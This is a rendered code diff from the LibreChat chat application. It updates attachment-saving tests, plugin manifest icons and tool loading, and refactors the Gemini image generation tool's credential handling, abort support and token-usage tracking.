||||||
|
});
|
||||||
|
|
||||||
|
test('strips text and _id from files before saving', async () => {
|
||||||
|
TestClient.saveMessageToDatabase = jest.fn().mockResolvedValue({ message: {} });
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello');
|
||||||
|
|
||||||
|
const userSave = TestClient.saveMessageToDatabase.mock.calls.find(
|
||||||
|
([msg]) => msg.isCreatedByUser,
|
||||||
|
);
|
||||||
|
expect(userSave[0].files[0].text).toBeUndefined();
|
||||||
|
expect(userSave[0].files[0]._id).toBeUndefined();
|
||||||
|
expect(userSave[0].files[0].filename).toBe('image.png');
|
||||||
|
});
|
||||||
|
|
||||||
|
test('deletes image_urls from userMessage when files are present', async () => {
|
||||||
|
TestClient.saveMessageToDatabase = jest.fn().mockResolvedValue({ message: {} });
|
||||||
|
TestClient.options.attachments = [
|
||||||
|
{ ...attachment, image_urls: ['data:image/png;base64,...'] },
|
||||||
|
];
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello');
|
||||||
|
|
||||||
|
const userSave = TestClient.saveMessageToDatabase.mock.calls.find(
|
||||||
|
([msg]) => msg.isCreatedByUser,
|
||||||
|
);
|
||||||
|
expect(userSave[0].image_urls).toBeUndefined();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('does not set files when no attachments match request file IDs', async () => {
|
||||||
|
TestClient.options.req = { body: { files: [{ file_id: 'file-nomatch' }] } };
|
||||||
|
TestClient.saveMessageToDatabase = jest.fn().mockResolvedValue({ message: {} });
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello');
|
||||||
|
|
||||||
|
const userSave = TestClient.saveMessageToDatabase.mock.calls.find(
|
||||||
|
([msg]) => msg.isCreatedByUser,
|
||||||
|
);
|
||||||
|
expect(userSave[0].files).toBeUndefined();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('skips file population when attachments is not an array (Promise case)', async () => {
|
||||||
|
TestClient.options.attachments = Promise.resolve([attachment]);
|
||||||
|
TestClient.saveMessageToDatabase = jest.fn().mockResolvedValue({ message: {} });
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello');
|
||||||
|
|
||||||
|
const userSave = TestClient.saveMessageToDatabase.mock.calls.find(
|
||||||
|
([msg]) => msg.isCreatedByUser,
|
||||||
|
);
|
||||||
|
expect(userSave[0].files).toBeUndefined();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('skips file population when skipSaveUserMessage is true', async () => {
|
||||||
|
TestClient.skipSaveUserMessage = true;
|
||||||
|
TestClient.saveMessageToDatabase = jest.fn().mockResolvedValue({ message: {} });
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello');
|
||||||
|
|
||||||
|
const userSave = TestClient.saveMessageToDatabase.mock.calls.find(
|
||||||
|
([msg]) => msg?.isCreatedByUser,
|
||||||
|
);
|
||||||
|
expect(userSave).toBeUndefined();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('ignores file_id: undefined entries in req.body.files (no set poisoning)', async () => {
|
||||||
|
TestClient.options.req = {
|
||||||
|
body: { files: [{ file_id: undefined }, { file_id: 'file-abc' }] },
|
||||||
|
};
|
||||||
|
TestClient.options.attachments = [
|
||||||
|
{ ...attachment, file_id: undefined },
|
||||||
|
{ ...attachment, file_id: 'file-abc' },
|
||||||
|
];
|
||||||
|
TestClient.saveMessageToDatabase = jest.fn().mockResolvedValue({ message: {} });
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello');
|
||||||
|
|
||||||
|
const userSave = TestClient.saveMessageToDatabase.mock.calls.find(
|
||||||
|
([msg]) => msg.isCreatedByUser,
|
||||||
|
);
|
||||||
|
expect(userSave[0].files).toHaveLength(1);
|
||||||
|
expect(userSave[0].files[0].file_id).toBe('file-abc');
|
||||||
|
});
|
||||||
|
});
|
||||||
});
|
});
|
||||||
|
|
|
||||||
|
|
@ -16,7 +16,7 @@
|
||||||
"name": "Google",
|
"name": "Google",
|
||||||
"pluginKey": "google",
|
"pluginKey": "google",
|
||||||
"description": "Use Google Search to find information about the weather, news, sports, and more.",
|
"description": "Use Google Search to find information about the weather, news, sports, and more.",
|
||||||
"icon": "https://i.imgur.com/SMmVkNB.png",
|
"icon": "assets/google-search.svg",
|
||||||
"authConfig": [
|
"authConfig": [
|
||||||
{
|
{
|
||||||
"authField": "GOOGLE_CSE_ID",
|
"authField": "GOOGLE_CSE_ID",
|
||||||
|
|
@ -61,7 +61,7 @@
|
||||||
"name": "DALL-E-3",
|
"name": "DALL-E-3",
|
||||||
"pluginKey": "dalle",
|
"pluginKey": "dalle",
|
||||||
"description": "[DALL-E-3] Create realistic images and art from a description in natural language",
|
"description": "[DALL-E-3] Create realistic images and art from a description in natural language",
|
||||||
"icon": "https://i.imgur.com/u2TzXzH.png",
|
"icon": "assets/openai.svg",
|
||||||
"authConfig": [
|
"authConfig": [
|
||||||
{
|
{
|
||||||
"authField": "DALLE3_API_KEY||DALLE_API_KEY",
|
"authField": "DALLE3_API_KEY||DALLE_API_KEY",
|
||||||
|
|
@ -74,7 +74,7 @@
|
||||||
"name": "Tavily Search",
|
"name": "Tavily Search",
|
||||||
"pluginKey": "tavily_search_results_json",
|
"pluginKey": "tavily_search_results_json",
|
||||||
"description": "Tavily Search is a robust search API tailored for LLM Agents. It seamlessly integrates with diverse data sources to ensure a superior, relevant search experience.",
|
"description": "Tavily Search is a robust search API tailored for LLM Agents. It seamlessly integrates with diverse data sources to ensure a superior, relevant search experience.",
|
||||||
"icon": "https://tavily.com/favicon.ico",
|
"icon": "assets/tavily.svg",
|
||||||
"authConfig": [
|
"authConfig": [
|
||||||
{
|
{
|
||||||
"authField": "TAVILY_API_KEY",
|
"authField": "TAVILY_API_KEY",
|
||||||
|
|
@ -87,14 +87,14 @@
|
||||||
"name": "Calculator",
|
"name": "Calculator",
|
||||||
"pluginKey": "calculator",
|
"pluginKey": "calculator",
|
||||||
"description": "Perform simple and complex mathematical calculations.",
|
"description": "Perform simple and complex mathematical calculations.",
|
||||||
"icon": "https://i.imgur.com/RHsSG5h.png",
|
"icon": "assets/calculator.svg",
|
||||||
"authConfig": []
|
"authConfig": []
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "Stable Diffusion",
|
"name": "Stable Diffusion",
|
||||||
"pluginKey": "stable-diffusion",
|
"pluginKey": "stable-diffusion",
|
||||||
"description": "Generate photo-realistic images given any text input.",
|
"description": "Generate photo-realistic images given any text input.",
|
||||||
"icon": "https://i.imgur.com/Yr466dp.png",
|
"icon": "assets/stability-ai.svg",
|
||||||
"authConfig": [
|
"authConfig": [
|
||||||
{
|
{
|
||||||
"authField": "SD_WEBUI_URL",
|
"authField": "SD_WEBUI_URL",
|
||||||
|
|
@ -107,7 +107,7 @@
|
||||||
"name": "Azure AI Search",
|
"name": "Azure AI Search",
|
||||||
"pluginKey": "azure-ai-search",
|
"pluginKey": "azure-ai-search",
|
||||||
"description": "Use Azure AI Search to find information",
|
"description": "Use Azure AI Search to find information",
|
||||||
"icon": "https://i.imgur.com/E7crPze.png",
|
"icon": "assets/azure-ai-search.svg",
|
||||||
"authConfig": [
|
"authConfig": [
|
||||||
{
|
{
|
||||||
"authField": "AZURE_AI_SEARCH_SERVICE_ENDPOINT",
|
"authField": "AZURE_AI_SEARCH_SERVICE_ENDPOINT",
|
||||||
|
|
@ -143,7 +143,7 @@
|
||||||
"name": "Flux",
|
"name": "Flux",
|
||||||
"pluginKey": "flux",
|
"pluginKey": "flux",
|
||||||
"description": "Generate images using text with the Flux API.",
|
"description": "Generate images using text with the Flux API.",
|
||||||
"icon": "https://blackforestlabs.ai/wp-content/uploads/2024/07/bfl_logo_retraced_blk.png",
|
"icon": "assets/bfl-ai.svg",
|
||||||
"isAuthRequired": "true",
|
"isAuthRequired": "true",
|
||||||
"authConfig": [
|
"authConfig": [
|
||||||
{
|
{
|
||||||
|
|
@ -156,14 +156,14 @@
|
||||||
{
|
{
|
||||||
"name": "Gemini Image Tools",
|
"name": "Gemini Image Tools",
|
||||||
"pluginKey": "gemini_image_gen",
|
"pluginKey": "gemini_image_gen",
|
||||||
"toolkit": true,
|
|
||||||
"description": "Generate high-quality images using Google's Gemini Image Models. Supports Gemini API or Vertex AI.",
|
"description": "Generate high-quality images using Google's Gemini Image Models. Supports Gemini API or Vertex AI.",
|
||||||
"icon": "assets/gemini_image_gen.svg",
|
"icon": "assets/gemini_image_gen.svg",
|
||||||
"authConfig": [
|
"authConfig": [
|
||||||
{
|
{
|
||||||
"authField": "GEMINI_API_KEY||GOOGLE_KEY||GEMINI_VERTEX_ENABLED",
|
"authField": "GEMINI_API_KEY||GOOGLE_KEY||GOOGLE_SERVICE_KEY_FILE",
|
||||||
"label": "Gemini API Key (Optional if Vertex AI is configured)",
|
"label": "Gemini API Key (optional)",
|
||||||
"description": "Your Google Gemini API Key from <a href='https://aistudio.google.com/app/apikey' target='_blank'>Google AI Studio</a>. Leave blank if using Vertex AI with service account."
|
"description": "Your Google Gemini API Key from <a href='https://aistudio.google.com/app/apikey' target='_blank'>Google AI Studio</a>. Leave blank to use Vertex AI with a service account (GOOGLE_SERVICE_KEY_FILE or api/data/auth.json).",
|
||||||
|
"optional": true
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -1,4 +1,3 @@
|
||||||
const fs = require('fs');
|
|
||||||
const path = require('path');
|
const path = require('path');
|
||||||
const sharp = require('sharp');
|
const sharp = require('sharp');
|
||||||
const { v4 } = require('uuid');
|
const { v4 } = require('uuid');
|
||||||
|
|
@ -6,12 +5,7 @@ const { ProxyAgent } = require('undici');
|
||||||
const { GoogleGenAI } = require('@google/genai');
|
const { GoogleGenAI } = require('@google/genai');
|
||||||
const { tool } = require('@langchain/core/tools');
|
const { tool } = require('@langchain/core/tools');
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const {
|
const { ContentTypes, EImageOutputType } = require('librechat-data-provider');
|
||||||
FileContext,
|
|
||||||
ContentTypes,
|
|
||||||
FileSources,
|
|
||||||
EImageOutputType,
|
|
||||||
} = require('librechat-data-provider');
|
|
||||||
const {
|
const {
|
||||||
geminiToolkit,
|
geminiToolkit,
|
||||||
loadServiceKey,
|
loadServiceKey,
|
||||||
|
|
@ -59,17 +53,12 @@ const displayMessage =
|
||||||
* @returns {string} - The processed string
|
* @returns {string} - The processed string
|
||||||
*/
|
*/
|
||||||
function replaceUnwantedChars(inputString) {
|
function replaceUnwantedChars(inputString) {
|
||||||
return inputString?.replace(/[^\w\s\-_.,!?()]/g, '') || '';
|
return (
|
||||||
}
|
inputString
|
||||||
|
?.replace(/\r\n|\r|\n/g, ' ')
|
||||||
/**
|
.replace(/"/g, '')
|
||||||
* Validate and sanitize image format
|
.trim() || ''
|
||||||
* @param {string} format - The format to validate
|
);
|
||||||
* @returns {string} - Safe format
|
|
||||||
*/
|
|
||||||
function getSafeFormat(format) {
|
|
||||||
const allowedFormats = ['png', 'jpg', 'jpeg', 'webp', 'gif'];
|
|
||||||
return allowedFormats.includes(format?.toLowerCase()) ? format.toLowerCase() : 'png';
|
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
@ -117,11 +106,8 @@ async function initializeGeminiClient(options = {}) {
|
||||||
return new GoogleGenAI({ apiKey: googleKey });
|
return new GoogleGenAI({ apiKey: googleKey });
|
||||||
}
|
}
|
||||||
|
|
||||||
// Fall back to Vertex AI with service account
|
|
||||||
logger.debug('[GeminiImageGen] Using Vertex AI with service account');
|
logger.debug('[GeminiImageGen] Using Vertex AI with service account');
|
||||||
const credentialsPath = getDefaultServiceKeyPath();
|
const credentialsPath = getDefaultServiceKeyPath();
|
||||||
|
|
||||||
// Use loadServiceKey for consistent loading (supports file paths, JSON strings, base64)
|
|
||||||
const serviceKey = await loadServiceKey(credentialsPath);
|
const serviceKey = await loadServiceKey(credentialsPath);
|
||||||
|
|
||||||
if (!serviceKey || !serviceKey.project_id) {
|
if (!serviceKey || !serviceKey.project_id) {
|
||||||
|
|
@ -131,75 +117,14 @@ async function initializeGeminiClient(options = {}) {
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
// Set GOOGLE_APPLICATION_CREDENTIALS for any Google Cloud SDK dependencies
|
|
||||||
try {
|
|
||||||
await fs.promises.access(credentialsPath);
|
|
||||||
process.env.GOOGLE_APPLICATION_CREDENTIALS = credentialsPath;
|
|
||||||
} catch {
|
|
||||||
// File doesn't exist, skip setting env var
|
|
||||||
}
|
|
||||||
|
|
||||||
return new GoogleGenAI({
|
return new GoogleGenAI({
|
||||||
vertexai: true,
|
vertexai: true,
|
||||||
project: serviceKey.project_id,
|
project: serviceKey.project_id,
|
||||||
location: process.env.GOOGLE_LOC || process.env.GOOGLE_CLOUD_LOCATION || 'global',
|
location: process.env.GOOGLE_LOC || process.env.GOOGLE_CLOUD_LOCATION || 'global',
|
||||||
|
googleAuthOptions: { credentials: serviceKey },
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
|
||||||
* Save image to local filesystem
|
|
||||||
* @param {string} base64Data - Base64 encoded image data
|
|
||||||
* @param {string} format - Image format
|
|
||||||
* @param {string} userId - User ID
|
|
||||||
* @returns {Promise<string>} - The relative URL
|
|
||||||
*/
|
|
||||||
async function saveImageLocally(base64Data, format, userId) {
|
|
||||||
const safeFormat = getSafeFormat(format);
|
|
||||||
const safeUserId = userId ? path.basename(userId) : 'default';
|
|
||||||
const imageName = `gemini-img-${v4()}.${safeFormat}`;
|
|
||||||
const userDir = path.join(process.cwd(), 'client/public/images', safeUserId);
|
|
||||||
|
|
||||||
await fs.promises.mkdir(userDir, { recursive: true });
|
|
||||||
|
|
||||||
const filePath = path.join(userDir, imageName);
|
|
||||||
await fs.promises.writeFile(filePath, Buffer.from(base64Data, 'base64'));
|
|
||||||
|
|
||||||
logger.debug('[GeminiImageGen] Image saved locally to:', filePath);
|
|
||||||
return `/images/${safeUserId}/${imageName}`;
|
|
||||||
}
|
|
||||||
|
|
||||||
/**
|
|
||||||
* Save image to cloud storage
|
|
||||||
* @param {Object} params - Parameters
|
|
||||||
* @returns {Promise<string|null>} - The storage URL or null
|
|
||||||
*/
|
|
||||||
async function saveToCloudStorage({ base64Data, format, processFileURL, fileStrategy, userId }) {
|
|
||||||
if (!processFileURL || !fileStrategy || !userId) {
|
|
||||||
return null;
|
|
||||||
}
|
|
||||||
|
|
||||||
try {
|
|
||||||
const safeFormat = getSafeFormat(format);
|
|
||||||
const safeUserId = path.basename(userId);
|
|
||||||
const dataURL = `data:image/${safeFormat};base64,${base64Data}`;
|
|
||||||
const imageName = `gemini-img-${v4()}.${safeFormat}`;
|
|
||||||
|
|
||||||
const result = await processFileURL({
|
|
||||||
URL: dataURL,
|
|
||||||
basePath: 'images',
|
|
||||||
userId: safeUserId,
|
|
||||||
fileName: imageName,
|
|
||||||
fileStrategy,
|
|
||||||
context: FileContext.image_generation,
|
|
||||||
});
|
|
||||||
|
|
||||||
return result.filepath;
|
|
||||||
} catch (error) {
|
|
||||||
logger.error('[GeminiImageGen] Error saving to cloud storage:', error);
|
|
||||||
return null;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Convert image files to Gemini inline data format
|
* Convert image files to Gemini inline data format
|
||||||
* @param {Object} params - Parameters
|
* @param {Object} params - Parameters
|
||||||
|
|
@ -326,8 +251,9 @@ function checkForSafetyBlock(response) {
|
||||||
* @param {string} params.userId - The user ID
|
* @param {string} params.userId - The user ID
|
||||||
* @param {string} params.conversationId - The conversation ID
|
* @param {string} params.conversationId - The conversation ID
|
||||||
* @param {string} params.model - The model name
|
* @param {string} params.model - The model name
|
||||||
|
* @param {string} [params.messageId] - The response message ID for transaction correlation
|
||||||
*/
|
*/
|
||||||
async function recordTokenUsage({ usageMetadata, req, userId, conversationId, model }) {
|
async function recordTokenUsage({ usageMetadata, req, userId, conversationId, model, messageId }) {
|
||||||
if (!usageMetadata) {
|
if (!usageMetadata) {
|
||||||
logger.debug('[GeminiImageGen] No usage metadata available for balance tracking');
|
logger.debug('[GeminiImageGen] No usage metadata available for balance tracking');
|
||||||
return;
|
return;
|
||||||
|
|
@ -363,6 +289,7 @@ async function recordTokenUsage({ usageMetadata, req, userId, conversationId, mo
|
||||||
{
|
{
|
||||||
user: userId,
|
user: userId,
|
||||||
model,
|
model,
|
||||||
|
messageId,
|
||||||
conversationId,
|
conversationId,
|
||||||
context: 'image_generation',
|
context: 'image_generation',
|
||||||
balance,
|
balance,
|
||||||
|
|
@ -390,34 +317,18 @@ function createGeminiImageTool(fields = {}) {
|
||||||
throw new Error('This tool is only available for agents.');
|
throw new Error('This tool is only available for agents.');
|
||||||
}
|
}
|
||||||
|
|
||||||
// Skip validation during tool creation - validation happens at runtime in initializeGeminiClient
|
const { req, imageFiles = [], userId, fileStrategy, GEMINI_API_KEY, GOOGLE_KEY } = fields;
|
||||||
// This allows the tool to be added to agents when using Vertex AI without requiring API keys
|
|
||||||
// The actual credentials check happens when the tool is invoked
|
|
||||||
|
|
||||||
const {
|
|
||||||
req,
|
|
||||||
imageFiles = [],
|
|
||||||
processFileURL,
|
|
||||||
userId,
|
|
||||||
fileStrategy,
|
|
||||||
GEMINI_API_KEY,
|
|
||||||
GOOGLE_KEY,
|
|
||||||
// GEMINI_VERTEX_ENABLED is used for auth validation only (not used in code)
|
|
||||||
// When set as env var, it signals Vertex AI is configured and bypasses API key requirement
|
|
||||||
} = fields;
|
|
||||||
|
|
||||||
const imageOutputType = fields.imageOutputType || EImageOutputType.PNG;
|
const imageOutputType = fields.imageOutputType || EImageOutputType.PNG;
|
||||||
|
|
||||||
const geminiImageGenTool = tool(
|
const geminiImageGenTool = tool(
|
||||||
async ({ prompt, image_ids, aspectRatio, imageSize }, _runnableConfig) => {
|
async ({ prompt, image_ids, aspectRatio, imageSize }, runnableConfig) => {
|
||||||
if (!prompt) {
|
if (!prompt) {
|
||||||
throw new Error('Missing required field: prompt');
|
throw new Error('Missing required field: prompt');
|
||||||
}
|
}
|
||||||
|
|
||||||
logger.debug('[GeminiImageGen] Generating image with prompt:', prompt?.substring(0, 100));
|
logger.debug('[GeminiImageGen] Generating image', { aspectRatio, imageSize });
|
||||||
logger.debug('[GeminiImageGen] Options:', { aspectRatio, imageSize });
|
|
||||||
|
|
||||||
// Initialize Gemini client with user-provided credentials
|
|
||||||
let ai;
|
let ai;
|
||||||
try {
|
try {
|
||||||
ai = await initializeGeminiClient({
|
ai = await initializeGeminiClient({
|
||||||
|
|
@ -432,10 +343,8 @@ function createGeminiImageTool(fields = {}) {
|
||||||
];
|
];
|
||||||
}
|
}
|
||||||
|
|
||||||
// Build request contents
|
|
||||||
const contents = [{ text: replaceUnwantedChars(prompt) }];
|
const contents = [{ text: replaceUnwantedChars(prompt) }];
|
||||||
|
|
||||||
// Add context images if provided
|
|
||||||
if (image_ids?.length > 0) {
|
if (image_ids?.length > 0) {
|
||||||
const contextImages = await convertImagesToInlineData({
|
const contextImages = await convertImagesToInlineData({
|
||||||
imageFiles,
|
imageFiles,
|
||||||
|
|
@ -447,17 +356,12 @@ function createGeminiImageTool(fields = {}) {
|
||||||
logger.debug('[GeminiImageGen] Added', contextImages.length, 'context images');
|
logger.debug('[GeminiImageGen] Added', contextImages.length, 'context images');
|
||||||
}
|
}
|
||||||
|
|
||||||
// Generate image
|
|
||||||
let apiResponse;
|
let apiResponse;
|
||||||
const geminiModel = process.env.GEMINI_IMAGE_MODEL || 'gemini-2.5-flash-image';
|
const geminiModel = process.env.GEMINI_IMAGE_MODEL || 'gemini-2.5-flash-image';
|
||||||
try {
|
|
||||||
// Build config with optional imageConfig
|
|
||||||
const config = {
|
const config = {
|
||||||
responseModalities: ['TEXT', 'IMAGE'],
|
responseModalities: ['TEXT', 'IMAGE'],
|
||||||
};
|
};
|
||||||
|
|
||||||
// Add imageConfig if aspectRatio or imageSize is specified
|
|
||||||
// Note: gemini-2.5-flash-image doesn't support imageSize
|
|
||||||
const supportsImageSize = !geminiModel.includes('gemini-2.5-flash-image');
|
const supportsImageSize = !geminiModel.includes('gemini-2.5-flash-image');
|
||||||
if (aspectRatio || (imageSize && supportsImageSize)) {
|
if (aspectRatio || (imageSize && supportsImageSize)) {
|
||||||
config.imageConfig = {};
|
config.imageConfig = {};
|
||||||
|
|
@ -469,6 +373,17 @@ function createGeminiImageTool(fields = {}) {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
let derivedSignal = null;
|
||||||
|
let abortHandler = null;
|
||||||
|
|
||||||
|
if (runnableConfig?.signal) {
|
||||||
|
derivedSignal = AbortSignal.any([runnableConfig.signal]);
|
||||||
|
abortHandler = () => logger.debug('[GeminiImageGen] Image generation aborted');
|
||||||
|
derivedSignal.addEventListener('abort', abortHandler, { once: true });
|
||||||
|
config.abortSignal = derivedSignal;
|
||||||
|
}
|
||||||
|
|
||||||
|
try {
|
||||||
apiResponse = await ai.models.generateContent({
|
apiResponse = await ai.models.generateContent({
|
||||||
model: geminiModel,
|
model: geminiModel,
|
||||||
contents,
|
contents,
|
||||||
|
|
@ -480,9 +395,12 @@ function createGeminiImageTool(fields = {}) {
|
||||||
[{ type: ContentTypes.TEXT, text: `Image generation failed: ${error.message}` }],
|
[{ type: ContentTypes.TEXT, text: `Image generation failed: ${error.message}` }],
|
||||||
{ content: [], file_ids: [] },
|
{ content: [], file_ids: [] },
|
||||||
];
|
];
|
||||||
|
} finally {
|
||||||
|
if (abortHandler && derivedSignal) {
|
||||||
|
derivedSignal.removeEventListener('abort', abortHandler);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check for safety blocks
|
|
||||||
const safetyBlock = checkForSafetyBlock(apiResponse);
|
const safetyBlock = checkForSafetyBlock(apiResponse);
|
||||||
if (safetyBlock) {
|
if (safetyBlock) {
|
||||||
logger.warn('[GeminiImageGen] Safety block:', safetyBlock);
|
logger.warn('[GeminiImageGen] Safety block:', safetyBlock);
|
||||||
|
|
@ -509,46 +427,7 @@ function createGeminiImageTool(fields = {}) {
|
||||||
const imageData = convertedBuffer.toString('base64');
|
const imageData = convertedBuffer.toString('base64');
|
||||||
const mimeType = outputFormat === 'jpeg' ? 'image/jpeg' : `image/${outputFormat}`;
|
const mimeType = outputFormat === 'jpeg' ? 'image/jpeg' : `image/${outputFormat}`;
|
||||||
|
|
||||||
logger.debug('[GeminiImageGen] Image format:', { outputFormat, mimeType });
|
|
||||||
|
|
||||||
let imageUrl;
|
|
||||||
const useLocalStorage = !fileStrategy || fileStrategy === FileSources.local;
|
|
||||||
|
|
||||||
if (useLocalStorage) {
|
|
||||||
try {
|
|
||||||
imageUrl = await saveImageLocally(imageData, outputFormat, userId);
|
|
||||||
} catch (error) {
|
|
||||||
logger.error('[GeminiImageGen] Local save failed:', error);
|
|
||||||
imageUrl = `data:${mimeType};base64,${imageData}`;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
const cloudUrl = await saveToCloudStorage({
|
|
||||||
base64Data: imageData,
|
|
||||||
format: outputFormat,
|
|
||||||
processFileURL,
|
|
||||||
fileStrategy,
|
|
||||||
userId,
|
|
||||||
});
|
|
||||||
|
|
||||||
if (cloudUrl) {
|
|
||||||
imageUrl = cloudUrl;
|
|
||||||
} else {
|
|
||||||
// Fallback to local
|
|
||||||
try {
|
|
||||||
imageUrl = await saveImageLocally(imageData, outputFormat, userId);
|
|
||||||
} catch (_error) {
|
|
||||||
imageUrl = `data:${mimeType};base64,${imageData}`;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
logger.debug('[GeminiImageGen] Image URL:', imageUrl);
|
|
||||||
|
|
||||||
// For the artifact, we need a data URL (same as OpenAI)
|
|
||||||
// The local file save is for persistence, but the response needs a data URL
|
|
||||||
const dataUrl = `data:${mimeType};base64,${imageData}`;
|
const dataUrl = `data:${mimeType};base64,${imageData}`;
|
||||||
|
|
||||||
// Return in content_and_artifact format (same as OpenAI)
|
|
||||||
const file_ids = [v4()];
|
const file_ids = [v4()];
|
||||||
const content = [
|
const content = [
|
||||||
{
|
{
|
||||||
|
|
@ -567,12 +446,15 @@ function createGeminiImageTool(fields = {}) {
|
||||||
},
|
},
|
||||||
];
|
];
|
||||||
|
|
||||||
// Record token usage for balance tracking (don't await to avoid blocking response)
|
const conversationId = runnableConfig?.configurable?.thread_id;
|
||||||
const conversationId = _runnableConfig?.configurable?.thread_id;
|
const messageId =
|
||||||
|
runnableConfig?.configurable?.run_id ??
|
||||||
|
runnableConfig?.configurable?.requestBody?.messageId;
|
||||||
recordTokenUsage({
|
recordTokenUsage({
|
||||||
usageMetadata: apiResponse.usageMetadata,
|
usageMetadata: apiResponse.usageMetadata,
|
||||||
req,
|
req,
|
||||||
userId,
|
userId,
|
||||||
|
messageId,
|
||||||
conversationId,
|
conversationId,
|
||||||
model: geminiModel,
|
model: geminiModel,
|
||||||
}).catch((error) => {
|
}).catch((error) => {
|
||||||
|
|
|
||||||
|
|
@ -1,7 +1,6 @@
|
||||||
const DALLE3 = require('../DALLE3');
|
const DALLE3 = require('../DALLE3');
|
||||||
const { ProxyAgent } = require('undici');
|
const { ProxyAgent } = require('undici');
|
||||||
|
|
||||||
jest.mock('tiktoken');
|
|
||||||
const processFileURL = jest.fn();
|
const processFileURL = jest.fn();
|
||||||
|
|
||||||
describe('DALLE3 Proxy Configuration', () => {
|
describe('DALLE3 Proxy Configuration', () => {
|
||||||
|
|
|
||||||
|
|
@ -14,15 +14,6 @@ jest.mock('@librechat/data-schemas', () => {
|
||||||
};
|
};
|
||||||
});
|
});
|
||||||
|
|
||||||
jest.mock('tiktoken', () => {
|
|
||||||
return {
|
|
||||||
encoding_for_model: jest.fn().mockReturnValue({
|
|
||||||
encode: jest.fn(),
|
|
||||||
decode: jest.fn(),
|
|
||||||
}),
|
|
||||||
};
|
|
||||||
});
|
|
||||||
|
|
||||||
const processFileURL = jest.fn();
|
const processFileURL = jest.fn();
|
||||||
|
|
||||||
const generate = jest.fn();
|
const generate = jest.fn();
|
||||||
|
|
|
||||||
|
|
@ -7,6 +7,7 @@ const {
|
||||||
} = require('@librechat/agents');
|
} = require('@librechat/agents');
|
||||||
const {
|
const {
|
||||||
checkAccess,
|
checkAccess,
|
||||||
|
toolkitParent,
|
||||||
createSafeUser,
|
createSafeUser,
|
||||||
mcpToolPattern,
|
mcpToolPattern,
|
||||||
loadWebSearchAuth,
|
loadWebSearchAuth,
|
||||||
|
|
@ -207,7 +208,7 @@ const loadTools = async ({
|
||||||
},
|
},
|
||||||
gemini_image_gen: async (toolContextMap) => {
|
gemini_image_gen: async (toolContextMap) => {
|
||||||
const authFields = getAuthFields('gemini_image_gen');
|
const authFields = getAuthFields('gemini_image_gen');
|
||||||
const authValues = await loadAuthValues({ userId: user, authFields });
|
const authValues = await loadAuthValues({ userId: user, authFields, throwError: false });
|
||||||
const imageFiles = options.tool_resources?.[EToolResources.image_edit]?.files ?? [];
|
const imageFiles = options.tool_resources?.[EToolResources.image_edit]?.files ?? [];
|
||||||
const toolContext = buildImageToolContext({
|
const toolContext = buildImageToolContext({
|
||||||
imageFiles,
|
imageFiles,
|
||||||
|
|
@ -222,7 +223,6 @@ const loadTools = async ({
|
||||||
isAgent: !!agent,
|
isAgent: !!agent,
|
||||||
req: options.req,
|
req: options.req,
|
||||||
imageFiles,
|
imageFiles,
|
||||||
processFileURL: options.processFileURL,
|
|
||||||
userId: user,
|
userId: user,
|
||||||
fileStrategy,
|
fileStrategy,
|
||||||
});
|
});
|
||||||
|
|
@ -370,8 +370,16 @@ const loadTools = async ({
|
||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (customConstructors[tool]) {
|
const toolKey = customConstructors[tool] ? tool : toolkitParent[tool];
|
||||||
requestedTools[tool] = async () => customConstructors[tool](toolContextMap);
|
if (toolKey && customConstructors[toolKey]) {
|
||||||
|
if (!requestedTools[toolKey]) {
|
||||||
|
let cached;
|
||||||
|
requestedTools[toolKey] = async () => {
|
||||||
|
cached ??= customConstructors[toolKey](toolContextMap);
|
||||||
|
return cached;
|
||||||
|
};
|
||||||
|
}
|
||||||
|
requestedTools[tool] = requestedTools[toolKey];
|
||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
||||||
2
api/cache/getLogStores.js
vendored
2
api/cache/getLogStores.js
vendored
|
|
@ -47,7 +47,7 @@ const namespaces = {
|
||||||
[CacheKeys.MODEL_QUERIES]: standardCache(CacheKeys.MODEL_QUERIES),
|
[CacheKeys.MODEL_QUERIES]: standardCache(CacheKeys.MODEL_QUERIES),
|
||||||
[CacheKeys.AUDIO_RUNS]: standardCache(CacheKeys.AUDIO_RUNS, Time.TEN_MINUTES),
|
[CacheKeys.AUDIO_RUNS]: standardCache(CacheKeys.AUDIO_RUNS, Time.TEN_MINUTES),
|
||||||
[CacheKeys.MESSAGES]: standardCache(CacheKeys.MESSAGES, Time.ONE_MINUTE),
|
[CacheKeys.MESSAGES]: standardCache(CacheKeys.MESSAGES, Time.ONE_MINUTE),
|
||||||
[CacheKeys.FLOWS]: standardCache(CacheKeys.FLOWS, Time.ONE_MINUTE * 3),
|
[CacheKeys.FLOWS]: standardCache(CacheKeys.FLOWS, Time.ONE_MINUTE * 10),
|
||||||
[CacheKeys.OPENID_EXCHANGED_TOKENS]: standardCache(
|
[CacheKeys.OPENID_EXCHANGED_TOKENS]: standardCache(
|
||||||
CacheKeys.OPENID_EXCHANGED_TOKENS,
|
CacheKeys.OPENID_EXCHANGED_TOKENS,
|
||||||
Time.TEN_MINUTES,
|
